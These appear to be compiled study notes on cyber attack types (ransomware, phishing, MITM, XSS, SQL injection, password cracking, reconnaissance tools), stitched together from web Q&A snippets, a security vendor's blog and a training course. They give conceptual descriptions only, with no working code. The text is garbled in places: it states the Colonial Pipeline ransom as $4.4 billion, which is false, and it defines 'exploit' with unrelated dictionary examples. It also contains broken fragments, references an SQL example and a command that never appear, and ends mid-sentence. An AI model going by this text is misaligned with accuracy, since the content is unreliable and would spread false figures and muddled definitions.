BREACHES IN CYBER SECURITY

A security breach is any incident that results in unauthorized access to

computer data, applications, networks or devices. It results in information being
accessed without authorization. ... A security breach is effectively a break-in,
whereas a data breach is defined as the cybercriminal getting away with
information.

What breach means?

1 : infraction or violation of a law, obligation, tie, or standard a breach of trust
sued them for breach of contract. 2a : a broken, ruptured, or torn condition or area
a breach of the skin the leak was a major security breach.

What is security compromise?

The unauthorized disclosure, modification, substitution, or use of sensitive data
(e.g., keys, metadata, or other security-related information) or the unauthorized
modification of a security-related system, device or process in order to gain
unauthorized access.

What are examples of breaches?

Breach is defined as break or violate. An example of breach is breaking a hole in
the sea wall. An example of breach is breaking a contract. A violation or
infraction, as of a contract, law, legal obligation, or promise.

How do security breaches happen?

This can be done by accessing a computer or network to steal local files or by
bypassing network security remotely. While most data breaches are attributed to
hacking or malware attacks, other breach methods include insider leaks, payment
card fraud, loss or theft of a physical hard drive of files and human error.

What are the three types of security?

 There are three primary areas or classifications of security controls. These
include management security, operational security, and physical security
controls.

What are the types of security breaches?

 MAN-IN-THE-MIDDLE ATTACK. ...

 DENIAL-OF-SERVICE AND DISTRIBUTED-DENIAL-OF-SERVICE
ATTACKS. ...
 PHISHING AND SPEAR PHISHING. ...
 PASSWORD ATTACK. ...
 EAVESDROP ATTACK. ...
 CROSS-SITE SCRIPTING ATTACK. ...
 MALWARE ATTACK

Most often, cyber attacks happen because criminals want your:

 business' financial details.
 customers' financial details (eg credit card data)
 sensitive personal data.
 customers' or staff email addresses and login credentials.
 customer databases.
 clients lists.
 IT infrastructure.
 What are the three main causes of security breaches?
Here's a short list of major causes for data breaches:
 Cause #1: Old, Unpatched Security Vulnerabilities. ...
 Cause #2: Human Error. ...
 Cause #3: Malware. ...
 Cause #4: Insider Misuse. ...
 Cause #5: Physical Theft of a Data-Carrying Device

What Is a Cyber Attack?

A cyber attack is an attempt by cybercriminals, hackers or other digital

adversaries to access a computer network or system, usually for the purpose of
altering, stealing, destroying or exposing information.

Cyber attacks can target a wide range of victims from individual users to
enterprises or even governments. When targeting businesses or other
organizations, the hacker’s goal is usually to access sensitive and valuable
company resources, such as intellectual property (IP), customer data or payment
details.

Common Types of Cyber Attacks

What are the most common cyber security risks?

Common Types of Cyber Attacks
1. Ransomware. Ransomware is a type of malware that denies legitimate users access
to their system and requires a payment, or ransom, to regain access. ...
2. Malware. ...
3. Malware as a Service (MaaS) ...
4. DoS and DDoS Attacks. ...
5. Phishing. ...
6. MITM Attack. ...
7. Cross-Site Scripting (XSS) ...
8. SQL Injections.

1. Ransomware

Ransomware  is a type of malware that denies legitimate users access to their
system and requires a payment, or ransom, to regain access. A ransomware
attack is designed to exploit system vulnerabilities and access the network. Once
a system is infected, ransomware allows hackers to either block access to the
hard drive or encrypt files.

In ransomware attacks, adversaries usually demand payment through

untraceable cryptocurrency. Unfortunately, in many ransomware attack cases,
the user is not able to regain access, even after the ransom is paid.

The rise in ransomware attacks

Ransomware is one of the most common types of malware attacks today.

According to the CrowdStrike Global Security Attitude Survey , which was
published in November 2020, more than half of the 2,200 respondents suffered
ransomware attacks over the previous 12 months.

CrowdStrike’s 2021 Global Threat Report  also explored the growing use of

ransomware within certain industries. Our analysis revealed that the most
common targets include organizations that are conducting vaccine research and
government agencies that are managing responses to COVID-19. The report also
notes that ransomware attacks on manufacturing facilities have proven uniquely
effective, as the time-sensitive nature of their production schedules often
renders paying the fee less expensive than losing critical throughput.

Unfortunately for targets, ransomware attacks also tend to be among the more
high-profile cybersecurity events, resulting in negative publicity and
reputational harm. For example, in May 2021, the Colonial Pipeline, which
supplies gasoline and jet fuel to the southeastern U.S., was the target of a
ransomware attack by the criminal hacking group DarkSide. Service was
temporarily disrupted, which impacted gas and fuel supply throughout the
region. While Colonial Pipeline paid the ransom, which totaled $4.4 billion, the
network operated very slowly.
2. Malware

Malware — or malicious software — is any program or code that is created with

the intent to do harm to a computer, network or server. Malware is the most
common type of cyberattack, mostly because this term encompasses many
subsets such as ransomware, trojans, spyware, viruses, worms, keyloggers, bots,
cryptojacking, and any other type of attack that leverages software in a
malicious way.

The rise of fileless malware

Because organizations are taking steps to defend against traditional ransomware

attacks, some cybercriminals are adapting their techniques to circumvent these
enhanced security measures. One of these advanced techniques involves
“fileless” malware, which is when malicious code is either embedded in a native
scripting language or written straight into memory using a program such as
PowerShell. In a fileless malware attack, it is also common for attackers to
exploit a public-facing web server, and then use a web shell to move laterally in
the environment.

Traditional antivirus products and even application whitelisting products are

completely blind to attacks that do not use malware. This underscores the need
for organizations to have advanced cybersecurity tools that protect against both
known and unknown threats.

To learn more about how to protect against such attacks, please see our
related video and infographic .

3. Malware as a Service (MaaS)

Another growing trend is the use of Malware as a Service (MaaS) for carrying
out cyberattacks. In a MaaS model, hackers are hired to conduct ransomware
attacks on behalf of a third-party. This model allows anyone who wishes to
carry out a cyberattack to do so, even if they lack the technical skills or
experience.

4. DoS and DDoS Attacks

A Denial-of-Service (DoS) attack  is a malicious, targeted attack that floods a
network with false requests in order to disrupt business operations.

In a DoS attack, users are unable to perform routine and necessary tasks, such as
accessing email, websites, online accounts or other resources that are operated
by a compromised computer or network. While most DoS attacks do not result
in lost data and are typically resolved without paying a ransom, they cost the
organization time, money and other resources in order to restore critical
business operations.

The difference between DoS and Distributed Denial of Service (DDoS) attacks
has to do with the origin of the attack. DoS attacks originate from just one
system while DDoS attacks are launched from multiple systems. DDoS attacks
are faster and harder to block than DOS attacks because multiple systems must
be identified and neutralized to halt the attack.

In 2018, the FBI shut down the largest DDoS-for-hire site on the dark web,
which led to a dip in DDoS attacks. However, numbers are now once again on
the rise. [According to recent research , DDoS attacks increased by 151% in the
first half of 2020.]

Part of the reason for this trend is the explosion of connected devices and
Internet of Things (IoT) technology. Unlike traditional endpoints, like
computers and smartphones, most IoT devices have relatively lax security
controls, making them susceptible to attacks and increasing their ability to be
overtaken by a botnet.

COVID-19 further exacerbated DDoS attacks in that the rapid shift to remote
work led to a proliferation of often poorly secured connected devices. This
dramatically expanded the attack surface at a time when many IT organizations
were preoccupied with basic tasks like ensuring remote access and support
services.

Example: The AWS DDoS Attack in 2020

Virtually any organization can fall victim to a DDoS attack, as evidenced by the
February 2020 attack on Amazon Web Services (AWS). Considered one of the
largest, high-profile DDoS attacks ever reported, this attack targeted an
unknown AWS customer using a technique called Connectionless Lightweight
Directory Access Protocol (CLDAP) reflection, which amplifies data sent to the
victim’s IP address through a server vulnerability. The attack, which lasted three
days, caused significant revenue losses for AWS customers and reputational
harm to AWS.

5. Phishing

Phishing is a type of cyberattack that uses email, SMS, phone, social media, and
social engineering techniques to entice a victim to share sensitive information
— such as passwords or account numbers — or to download a malicious file
that will install viruses on their computer or phone.

Common phishing examples in the COVID era

As noted above, COVID-19 dramatically increased cyberattacks of all kinds,

including phishing attacks. During the lockdown period, people generally spent
more time online and also experienced heightened emotions — the virtual recipe
for an effective phishing campaign.

Throughout 2020, the CrowdStrike data science team closely tracked COVID-
19-related malspam (malicious spam). Most attacks urged the recipient to
download an attachment, which was malware that then acted as a keylogger or
password stealer. Some of the most common scenarios and techniques included:

 Impersonating a doctor and claiming to be able to treat or cure COVID-19.

 Impersonating a government organization that is sharing important public
health information.
 Impersonating a courier service that is attempting to deliver a package.

For more information about common phishing techniques in the COVID era,
please access our companion post on phishing attacks.

The Most Impersonated Organizations in Phishing Scams

While the most well-known phishing attacks usually involve outlandish claims,
such as a member of a royal family requesting an individual’s banking
information, the modern phishing attack is far more sophisticated. In many
cases, a cyber criminal may masquerade as common retailers, service providers
or government agencies to extract personal information that may seem benign
such as email addresses, phone numbers, the user’s date of birth, or the names
of family members.
To assess exactly which organizations are being impersonated the most in
phishing scams, the CrowdStrike data science team submitted an FOIA request
to the Federal Trade Commission and asked for the total number of phishing
scams reported as impersonating the top 50 brands and all U.S. federal agencies.

The results show the U.S. public which emails from brands and organizations
they need to be the most cautious of, and which are the most lucrative to
impersonate for phishing criminals. Topping the list is e-retailer Amazon,
followed by technology companies Apple (2), Microsoft (4) and Facebook (8).
Other organizations include: the Social Security Administration (3); retail
banks, such as Bank of America (5) and Wells Fargo (6); telecommunications
providers such as AT&T (7) and Comcast (10); retailers such as Costco (11),
Walmart (12) and Home Depot (18); and courier services such as FedEx (9) and
UPS (14).

To view the complete list, please access our companion post on phishing
attacks.

6. MITM Attack

A man-in-the-middle (MITM) attack  is a type of cyberattack in which a

malicious actor eavesdrops on a conversation between a network user and a web
application. The goal of a MITM attack is to surreptitiously collect information,
such as personal data, passwords or banking details, and/or to impersonate one
party to solicit additional information or spur action. These actions can include
changing login credentials, completing a transaction or initiating a transfer of
funds.

While MITM attackers often target individuals, it is a significant concern for

businesses and large organizations as well. One common point of access for
hackers is through software-as-a-service (SaaS) applications. The cyber attacker
can then use these applications as an entryway to the organization’s wider
network and potentially compromise any number of assets, including customer
data, IP or proprietary information about the organization and its employees.

The sudden influx of remote workers, which relied on SaaS applications to

complete routine tasks during COVID-19 lockdown periods, as well as an
increase in connected devices, has significantly increased the opportunity for
MITM attacks over the past two years.

The next frontier: Machine-in-the-Middle

[Although generally less well-known than ransomware or malware attacks,
MITM attacks are among the most widely used methods available to
cybercriminals. According to some estimates , 35 percent of incidents where
cyber weaknesses have been exploited involved MItM attacks.]

As with malware attacks, advances in cyber security defenses have made MITM
and other network-based attacks increasingly difficult to execute. As a result,
cybercriminals have now begun to target the endpoint instead of the network in
these attacks. For example, the hacker may target a user’s computer and install a
root Certificate Authority (CA) and then generate valid digital certificates that
allow them to impersonate any website. Since the root CA is controlled by the
hacker, encrypted communication sent by the user can be intercepted. In this
way, the concept of ‘Man-in-the-Middle’ becomes ‘Machine-in-the-Middle.’

One recent MITM attacker identified by CrowdStrike was a Trickbot module

called shaDll. The module installed illegitimate SSL certificates on infected
computers, which allowed the tool to gain access to the user network. The
module was then able to redirect web activity, inject code, take screenshots and
gather data.

Example: The Fall of WebNavigatorBrowser

Another attack recently highlighted by CrowdStrike relates to Chromium-based

Adware Browser WebNavigatorBrowser. This web browser falls into the
category of adware because it injects ads into search results. The developer
based it on Google’s free and open-source browser software project, Chromium.
It is copyrighted and signed by Better Cloud Solutions LTD, a legally registered
company in the U.K.

In early 2020, Sectigo, (formerly known as Comodo) a well-known Certificate

Authority (CA), revoked WebNavigatorBrowser’s certificate, making this attack
vector a thing of the past.

For more information, please read our companion post: The Rise and Fall of
WebNavigatorBrowser: Chromium-based Adware Browser.

7. Cross-Site Scripting (XSS)

Cross Site Scripting (XSS)  is a code injection attack in which an adversary
inserts malicious code within a legitimate website. The code then launches as an
infected script in the user’s web browser, enabling the attacker to steal sensitive
information or impersonate the user. Web forums, message boards, blogs and
other websites that allow users to post their own content are the most
susceptible to XSS attacks.

Though an XSS attack targets individual web application visitors, the

vulnerabilities lie in the application or web site. As such, organizations that
needed to deploy a remote workforce may have inadvertently exposed itself to
this type of attack by making internal applications available via web or by
deploying cloud-based services. This increased the attack surface at a time of
significant strain for businesses and IT teams, in particular.

8. SQL Injections

A SQL Injection attack is similar to XSS in that adversaries leverage system

vulnerabilities to inject malicious SQL statements into a data-driven application,
which then allows the hacker to extract information from a database. Hackers
use SQL Injection techniques to alter, steal or erase data.

The main difference between XSS and SQL Injection has to do with who is
targeted. The XSS is a client-side vulnerability that targets other application
users, whereas the SQL injection is a server-side vulnerability that targets the
application’s database.

One of the most common targets of SQL injection attacks are gamers and the
gaming industry. According to Akamai’s State of the Internet  report, attacks on
the gaming industry increased three-fold between 2019 and 2020, reaching more
than 240 million web application attacks. SQL injections were the most
common attack vector; this technique was used to access player login
credentials and other personal information.

Once again, this uptick is attributable to increased time spent online due to
COVID-19 lockdowns and social distancing.

9. DNS Tunneling

DNS Tunneling is a type of cyberattack that leverages domain name system

(DNS) queries and responses to bypass traditional security measures and
transmit data and code within the network.

Once infected, the hacker can freely engage in command-and-control activities.

This tunnel gives the hacker a route to unleash malware and/or to extract data,
IP or other sensitive information by encoding it bit by bit in a series of DNS
responses.

DNS tunneling attacks have increased in recent years, in part because they are
relatively simple to deploy. Tunneling toolkits and guides are even readily
accessible online through mainstream sites like YouTube.

10. Password Attack

Password attacks—any cyberattack wherein a hacker attempts to steal a user’s

password—are one of the leading causes of both corporate and personal data
breaches.

Password attacks are on the rise because they are an effective means for gaining
access to a network or account. Since many users do not set strong passwords,
reuse existing passwords across multiple sites or fail to regularly change their
password, hackers can exploit these weaknesses.

[According to the Verizon 2021 Data Breach Investigations

Report, compromised credentials, such as weak passwords, are the primary
point of access for hackers. More than six in ten breaches (61%) originate with
user credentials.]

11. Birthday Attacks

Birthday attacks are a type of brute force attack that attempts to identify two
matching hash values to crack a password. The attack takes its name from the
probability theory that within a group of 30 people, there is a 70% likelihood
that two people share the same birthday.

12. Drive By Attack

A drive-by attack, sometimes called a drive-by download, is a more

sophisticated form of a malware attack that leverages vulnerabilities in various
web browsers, plugins, or apps, to launch the attack. It does not require any
human action to initiate. Once the attack is underway, the hacker can hijack the
device, spy on the user’s activity or steal data and personal information.
Though a drive-by attack is far more complex to deploy, they are becoming
more common as cybersecurity measures become more advanced and
sufficiently deflect traditional malware attacks.

13. Cryptojacking

Cryptojacking is the unauthorized use of a person’s or organization’s computing

resources to mine cryptocurrency.

Cryptojacking programs may be malware that is installed on a victim’s

computer via phishing, infected websites, or other methods common to malware
attacks; they may also be small pieces of code inserted into digital ads or web
pages that only operate while the victim is visiting a particular website.

Cryptojacking attacks have waned since 2018 due to increased attention from
law enforcement, as well as the decommissioning of Coinhive, the leading
crypto-mining site for Monero cryptocurrency. However, such attacks have
since increased once again due to the rising value of cryptocurrencies.

14. IoT-Based Attacks

An IoT attack is any cyberattack that targets an Internet of Things (IoT) device
or network. Once compromised, the hacker can assume control of the device,
steal data, or join a group of infected devices to create a botnet to launch DoS or
DDoS attacks.

[According to the Nokia Threat Intelligence Lab , connected devices are

responsible for nearly one-third of mobile network infections – more than
double the amount in 2019.]

Given that the number of connected devices is expected to grow rapidly over the
next several years, cybersecurity experts expect IoT infections to grow as well.
Further, the deployment of 5G networks, which will further fuel the use of
connected devices, may also lead to an uptick in attacks.

EXPLOITS in cyber security

An exploit is a code that takes advantage of a software vulnerability or

security flaw. ... Instead of using a malicious file, the exploit may instead drop
another malware, which can include backdoor Trojans and spyware that can steal
user information from the infected systems.

What are types of exploits?

Exploits are commonly classified as one of two types: known or unknown.
Known exploits have already been discovered by cybersecurity researchers.
Whether the known exploit is due to a vulnerability in the software, OS, or even
hardware, developers can code patches to plug the hole

What are examples of exploits?

An example of exploit is a journey to the top of a large mountain. Exploit is
defined as to use someone or something to achieve one's own purposes. An
example of exploit is to pretend to befriend an intelligent student in class for the
sole purpose of copying his homework.

How many types of exploits are there?

Explanation: There are two different types of exploits. These are remote exploits
– where hackers can gain access to the system or network remotely, and local
exploits – where the hacker need to access the system physically and overpass the
rights.

INFORMATION GATHERING

What is information gathering cyber security?

An information-gathering mission in cybersecurity is the act of collecting
information about a potential target. This could be done for penetration testing,
network security monitoring or other cybersecurity tasks.

Information Gathering means gathering different kinds of information about the

target. It is basically, the first step or the beginning stage of Ethical Hacking,
where the penetration testers or hackers (both black hat or white hat) tries to
gather all the information about the target, in order to use it for Hacking. To
obtain more relevant results, we have to gather more information about the target
to increase the probability of a successful attack. 0
Information gathering is an art that every penetration-tester (pen-tester) and
hacker should master for a better experience in penetration testing. It is a method
used by analysts to determine the needs of customers and users. Techniques that
provide safety, utility, usability, learnability, etc. for collaborators result in their
collaboration, commitment, and honesty. Various tools and techniques are
available, including public sources such as Whois, nslookup which can help
hackers to gather user information. This step is very important because while
performing attacks on any target information (such as his pet name, best friend’s
name, age, or phone number to perform password guessing attacks(brute force) or
other kinds of attacks) are required. 
Information gathering can be classified into the following categories: 
 Footprinting
 Scanning
 Enumeration
 Reconnaissance

1. Nmap Tool
Nmap is an open-source network scanner that is used to recon/scan networks. It is
used to discover hosts, ports, and services along with their versions over a
network. It sends packets to the host and then analyzes the responses in order to
produce the desired results. It could even be used for host discovery, operating
system detection, or scanning for open ports. It is one of the most popular
reconnaissance tools.

2. ZenMAP

It is another useful tool for the scanning phase of Ethical Hacking in Kali Linux.
It uses the Graphical User Interface. It is a great tool for network discovery and
security auditing. It does the same functions as that of the Nmap tool or in other
words, it is the graphical Interface version of the Nmap tool. It uses command
line Interface. It is a free utility tool for network discovery and security auditing.
Tasks such as network inventory, managing service upgrade schedules, and
monitoring host or service uptime are considered really useful by systems and
network administrators.

3. whois lookup

whois is a database record of all the registered domains over the internet. It is
used for many purposes, a few of them are listed below. 
 It is used by Network Administrators in order to identify and fix DNS or
domain-related issues.
 It is used to check the availability of domain names.
 It is used to identify trademark infringement.
 It could even be used to track down the registrants of the Fraud domain.
To use whois lookup, enter the following command in the terminal 

4. SPARTA

SPARTA is a python based Graphical User Interface tool which is used in the
scanning and enumeration phase of information gathering. It is a toolkit having a
collection of some useful tools for information gathering. It is used for many
purposes, a few of them are listed below. 
 It is used to export Nmap output to an XML file.
 It is used to automate the process of Nikto tool to every HTTP service or any
other service.
 It is used to save the scan of the hosts you have scanned earlier in order to save
time.
 It is used to reuse the password which is already found and is not present in the
wordlist.
To use SPARTA, enter the IP address of the host you want to scan in the host
section to start scanning.

5. nslookup
nslookup stands for nameserver lookup, which is a command used to get the
information from the DNS server. It queries DNS to obtain a domain name, IP
address mapping, or any other DNS record. It even helps in troubleshooting
DNS-related problems. It is used for many purposes, a few of them are listed
below. 
 To get the IP address of a domain.
 For reverse DNS lookup
 For lookup for any record
 Lookup for an SOA record
 Lookup for an ns record
 Lookup for an MX record
 Lookup for a txt record
 APPLICATION ATTACK in cyber security

An application attack consists of cyber criminals gaining access to unauthorized

areas. Attackers most commonly start with a look at the application layer, hunting
for application vulnerabilities written within code.

What is an application level attack?

An application-layer attack targets computers by deliberately causing a fault in
a computer's operating system or applications. This results in the attacker
gaining the ability to bypass normal access controls. The attacker takes advantage
of this situation, gaining control of an application, system or network.
Cracking Techniques IN CYBER SECURITY

Common Password-Cracking Techniques

 Brute Force Attack. In a brute-force attack, the attacker tries to crack the password
by submitting various combinations until the correct one is found. ...
 Dictionary Attack. ...
 Rainbow Table Attack. ...
 Social Engineering. ...
 Phishing.
 What is cracking in cyber security?


 Cracking is when someone performs a security hack for criminal or

malicious reasons, and the person is called a “cracker.” Just like a bank
robber cracks a safe by skillfully manipulating its lock, a cracker breaks into
a computer system, program, or account with the aid of their technical
wizardry

 What is password cracking in cyber security?

  In cryptanalysis and computer security, password cracking is the process of
recovering passwords from data that has been stored in or transmitted
by a computer system in scrambled form.
What tools do hackers use to crack?
List Of Popular Password Hacking Software
 CrackStation.
 Password Cracker.
 Brutus Password Cracker.
 Aircrack.
 RainbowCrack.
 THC Hydra.
 Cain and Abel.
 Medusa.


The Rise of Cyber Attacks

In recent years, cyberattacks have become more sophisticated, increasing the

need for a comprehensive cybersecurity strategy and tooling.

The world recorded a steep increase in cyber attacks and cybercrime in 2020.
According to CrowdStrike’s 2020 Threat Hunting Report , which analyzes
intrusion attempts within the CrowdStrike customer network, more breaches
were attempted in the first half of 2020 than in all of 2019. The report revealed
that the CrowdStrike threat hunting team blocked roughly 41,000 potential
intrusions from January through June 2020, as compared to 35,000 intrusions
during the entirety of the previous year. This represents a 154% increase in
cyberattacks year-on-year.

This increase may be attributed to several factors including:

 The COVID-19 pandemic and stay-at-home orders, which dramatically

increased the amount of time people spent online;
 The shift to remote work (an existing trend that was rapidly accelerated due
to COVID-19), which increased the use of personal connected devices, as
 well as personal networks, thereby expanding the attack surface for
organizations;
 The proliferation of connected devices and Internet of Things (IoT)
technology, which provide a plethora of entry points for cybercriminals;
 The shift to the cloud, which requires a fundamentally different security
strategy as compared to traditional on-premises networks;
 5G technology, which is further fueling the use of connected devices; and
 The availability of hackers “as-a-service” which makes ransomware and
other malware attacks available to those who lack the technical expertise to
carry out such an attack personally.

How To Protect Against Cyber Attacks

A comprehensive cybersecurity strategy is absolutely essential in today’s
connected world. From a business perspective, securing the organization’s
digital assets has the obvious benefit of a reduced risk of loss, theft or
destruction, as well as the potential need to pay a ransom to regain control of
company data or systems. In preventing or quickly remediating cyberattacks, the
organization also minimizes the impact of such events on business operations.
Finally, when an organization takes steps to deter adversaries, they are
essentially protecting the brand from the reputational harm that is often
associated with cyber events — especially those that involve the loss of
customer data.

Below are some recommendations we offered in our 2020 Global Security

Attitude Survey to help organizations improve their security posture and ensure
cybersecurity readiness:

 Continue to invest in digital transformation to keep pace with the eCrime

and nation-state threats. Replacing legacy, on-premises technologies with
 cloud-native platforms — such as CrowdStrike Falcon® — that are
designed to protect remote and hybrid environments will be critical to
ensuring protection in the new work-from-anywhere environments that are
here to stay.
 Focus on protecting all workloads wherever they are rather than maintaining
security models built around network perimeters. A solution such as
CrowdStrike® Falcon Cloud Workload Protection provides breach
protection across private, public, hybrid and multi-cloud environments so
you can rapidly adopt and secure technology across any workload.
 Integrate identity protection with run-time protection of workloads,
endpoints and mobile devices to alleviate the strain on IT teams, and keep
your organization secure by allowing your team to plan, implement and
migrate to the cloud-native applications you need to secure your business
and employees — no matter where they are located.
 Strive to meet the 1-10-60 rule that CrowdStrike introduced in 2018: one
minute to detect a cyber threat, 10 to investigate and 60 to contain and
remediate. The survey reveals that it takes organizations an average of 117
hours to even detect an incident or intrusion (reflecting very little
improvement from 120 hours in 2019) — and many more to investigate and
contain it. The CrowdStrike Falcon platform enables security teams to
shorten the time to investigate and understand a cybersecurity threat by
providing deep context, seamlessly integrated threat intelligence and
sophisticated visualizations.

Types of attacks on a system

Operating System Attacks

Today’s Operating Systems (OS) are loaded with features and are increasingly
complex. While users take advantage of these features, they are prone to more
vulnerabilities, thus enticing attackers. Operating systems run many services such
as graphical user interfaces (GUIs) that support applications and system tools, and
enable Internet access. Extensive tweaking is required to lock them
down. Attackers constantly look for OS vulnerabilities that allow them to exploit
and gain access to a target system or network. To stop attackers from
compromising the network, the system or network administrators must keep
abreast of various new exploits and methods adopted by attackers, and monitor the
networks regularly.
By default, most operating systems’ installation programs install a large number of
services and open ports. This situation leads attackers to search
for vulnerabilities. Applying patches and hot fixes is not easy with today’s
complex networks. Most patches and fixes tend to solve an immediate issue. In
order to protect the system from operating system attacks in general, it is necessary
to remove and/or disable any unneeded ports and services.
Some OS vulnerabilities include:
– Buffer overflow vulnerabilities
– Bugs in the operating system
– An unmatched operating system
Attacks performed at the 05 level include:
– Exploiting specific network protocol implementations
– Attacking built-in authentication systems
– Breaking file-system security
– Cracking passwords and encryption mechanisms

Misconfiguration Attacks
Security misconfiguration or poorly configured security controls might allow
attackers to gain unauthorized access to the system, compromise files, or perform
other unintended actions. Misconfiguration vulnerabilities affect web servers,
application platforms, databases, networks, or frameworks that may result in illegal
access or possible system takeover. Administrators should change the default
configuration of the devices before deploying them in the production network. To
optimize the configuration of the machine, remove any unneeded services or
software. Automated scanners detect missing patches, Misconfiguration, use of
default accounts, unnecessary services, and so on.
 Top 10 Most Common Types of Cyber Attacks

Application-Level Attacks
Software developers are often under intense pressure to meet deadlines, which can
mean they do not have sufficient time to completely test their products before
shipping them, leaving undiscovered security holes. This is particularly
troublesome in newer software applications that come with a large number of
features and functionalities, making them more and more complex. An increase in
the complexity means more opportunities for vulnerabilities. Attackers find and
exploit these vulnerabilities in the applications using different tools and techniques
to gain unauthorized access and steal or manipulate data.
Security is not always a high priority to software developers, and they handle it as
an “add-on” component after release. This means that not all instances of the
software will have the same level of security. Error checking in these applications
can be very poor (or even nonexistent), which leads to:
 Buffer overflow attacks
 Sensitive information disclosure
 Denial-of-service attacks
 SQL injection attacks
 Cross-site scripting
 Phishing
 Session hijacking
 Parameter/form tampering
 Man-in-the-middle attacks
 Directory traversal attacks
 SQL injection attacks

Shrink-Wrap Code Attacks:

Software developers often use free libraries and code licensed from other sources
in their programs to reduce development time and cost. This means that large
portions of many pieces of software will be the same, and if an attacker discovers
vulnerabilities in that code, many pieces of software are at risk.
Attackers exploit default configuration and settings of the off-the-shelf libraries
and code. The problem is that software developers leave the libraries and code
unchanged. They need to customize and fine-tune every part of their code in order
to make it not only more secure, but different enough so that the same exploit will
not work. 
An attack can be active or passive. An “active attack” attempts to alter system
resources or affect their operation. A “passive attack” attempts to learn or make
use of information from the system but does not affect system resources
(e.g., wiretapping).you can learn all types of attack in CEH v10 location in
Mumbai. The infosavvy provides the certified Ethical hacking training and EC
Council Certification.
 
Man-in-the-middle (MitM) attack
A MitM attack occurs when a hacker inserts itself between the communications of
a client and a server. Here are some common types of man-in-the-middle attacks:
Session hijacking
In this type of MitM attack, an attacker hijacks a session between a trusted client
and network server. The attacking computer substitutes its IP address for the
trusted client while the server continues the session, believing it’s communicating
with the client. as an example , the attack might unfold like this:
1. A client connects to a server.
2. The attacker’s computer gains control of the client.
3. The attacker’s computer disconnects the client from the server.
4. The attacker’s computer replaces the client’s IP address with its own IP address
and spoofs the client’s sequence numbers.
5. The attacker’s computer continues dialog with the server and therefore the
server believes it’s still communicating with the client.

IP Spoofing
IP spoofing is used by an attacker to convince a system that it’s communicating
with a known, trusted entity and provide the attacker with access to the system.
The attacker sends a packet with the IP source address of a known, trusted host
rather than its own IP source address to a target host. The target host might accept
the packet and act upon it.

Replay
A replay attack occurs when an attacker intercepts and saves old messages then
tries to send them later, impersonating one among the participants. this sort can be
easily countered with session timestamps or nonce (a random number or a string
that changes with time).
Currently, there’s no single technology or configuration to stop all MitM attacks.
Generally, encryption and digital certificates provide an efficient safeguard against
MitM attacks, assuring both the confidentiality and integrity of communications.

To reduce the danger of being phished, you’ll use these techniques:

 Critical thinking — don’t accept that an email is that the real deal just
because you’re busy or stressed otherwise you have 150 other unread
messages in your inbox. Stop for a moment and analyze the e-mail.
 Hovering over the links — Move your mouse over the link, but don’t click
it! Just let your mouse cursor h over over the link and see where would
actually take you. Apply critical thinking to decipher the URL.
  Analyzing email headers — Email headers define how an email need to
your address. The “Reply-to” and “Return-Path” parameters should lead to
the same domain as is stated within the email.
 Sandboxing — you’ll test email content during a sandbox environment,
logging activity from opening the attachment or clicking the links inside the
e-mail .

Drive-by attack
Drive-by download attacks are a standard method of spreading malware.
Hackers search for insecure websites and plant a malicious script into HTTP
or PHP code on one among the pages. This script might install malware directly
onto the pc of somebody who visits the site, or it’d re-direct the victim to a site
controlled by the hackers. Drive-by downloads can happen when visiting a website
or viewing an email message or a pop-up window. Unlike many other types of
cyber security attacks, a drive-by doesn’t rely on a user to do anything to actively
enable the attack — you don’t need to click a download button or open a malicious
email attachment to become infected. A drive-by download can cash in of an app,
operating system or web browser that contains security flaws thanks to
unsuccessful updates or lack of updates.
To protect yourself from drive-by attacks, you would like to stay your browsers
and operating systems up to date and avoid websites which may contain malicious
code. stick with the sites you normally use — although keep in mind that even
these sites are often hacked. Don’t keep too many unnecessary programs and apps
on your device. The more plug-ins you have, the more vulnerabilities there are
which will be exploited by drive-by attacks.

Password attack:

Because passwords are the most commonly used mechanism to authenticate

users to an information system, obtaining passwords may be a common and
effective attack approach. Access to a person’s password are often obtained by
looking round the person’s desk, ‘‘sniffing’’ the connection to the network to
acquire unencrypted passwords, using social engineering, gaining access to a
password database or outright guessing. The last approach are often done in either
a random or systematic manner:
• Brute-force: password guessing means using a random approach by trying
different passwords and hoping that one work Some logic are often applied by
trying passwords related to the person’s name, job title, hobbies or similar items.

• Dictionary attack, a dictionary of common passwords is used to attempt to

realize access to a user’s computer and network. One approach is to copy an
encrypted file that contains the passwords, apply an equivalent encryption to a
dictionary of commonly used passwords, and compare the results.
In order to protect yourself from dictionary or brute-force attacks, you would like
to implement an account lockout policy which will lock the account after a few
invalid password attempts. you’ll follow these account lockout best practices so as
to set it up correctly.

SQL injection attack

SQL injection has become a common issue with database-driven websites. It
occurs when a malefactor executes a SQL query to the database via the input file
from the client to server. SQL commands are inserted into data-plane input (for
example, rather than the login or password) in order to run predefined SQL
commands. A successful SQL injection exploit can read sensitive data from the
database, modify (insert, update or delete) database data, execute administration
operations (such as shutdown) on the database, recover the content of a given file,
and, in some cases, issue commands to the OS.
For example, a web form on a website might request a user’s account name then
send it to the database in order to pull up the associated account information using
dynamic SQL like this:

Cross-site scripting (XSS) attack

XSS attacks use third-party web resources to run scripts within the victim’s
browser or scrip table application. Specifically, the attacker injects a payload
with malicious JavaScript into a website’s database. When the victim requests a
page from the web site , the web site transmits the page, with the attacker’s
payload as a part of the HTML body, to the victim’s browser, which executes the
malicious script. for instance , it’d send the victim’s cookie to the attacker’s server,
and therefore the attacker can extract it and use it for session hijacking. the
foremost dangerous consequences occur when XSS is employed to take advantage
of additional vulnerabilities. These vulnerabilities can enable an attacker to not
only steal cookies, but also log key strokes, capture screenshots, discover and
collect network information, and remotely access and control the victim’s machine.
While XSS are often taken advantage of within VBScript, ActiveX and Flash, the
foremost widely abused is JavaScript — primarily because JavaScript is supported
widely on the online .
To defend against XSS attacks, developers can sanitize data input by users in an
HTTP request before reflecting it back. confirm all data is validated, filtered or
escaped before echoing anything back to the user, like the values of query
parameters during searches. Convert special characters like ?, &, /, and spaces to
their respective HTML or URL encoded equivalents. Give users the choice to
disable client-side scripts.

Eavesdropping attack
Eavesdropping attacks occur through the interception of network traffic. By
eavesdropping, an attacker can obtain passwords, credit card numbers and other
confidential information that a user might be sending over the network.
Eavesdropping can be passive or active:
 Passive eavesdropping — A hacker detects the information by listening to
the message transmission in the network.
 Active eavesdropping — A hacker actively grabs the information by
disguising himself as friendly unit and by sending queries to transmitters.
This is called probing, scanning or tampering.
Detecting passive eavesdropping attacks is often more important than spotting
active ones, since active attacks requires the attacker to gain knowledge of the
friendly units by conducting passive eavesdropping before.
Data encryption is the best countermeasure for eavesdropping.

Malware attack
Malicious software are often described as unwanted software that’s installed in
your system without your consent. It can attach itself to legitimate code and
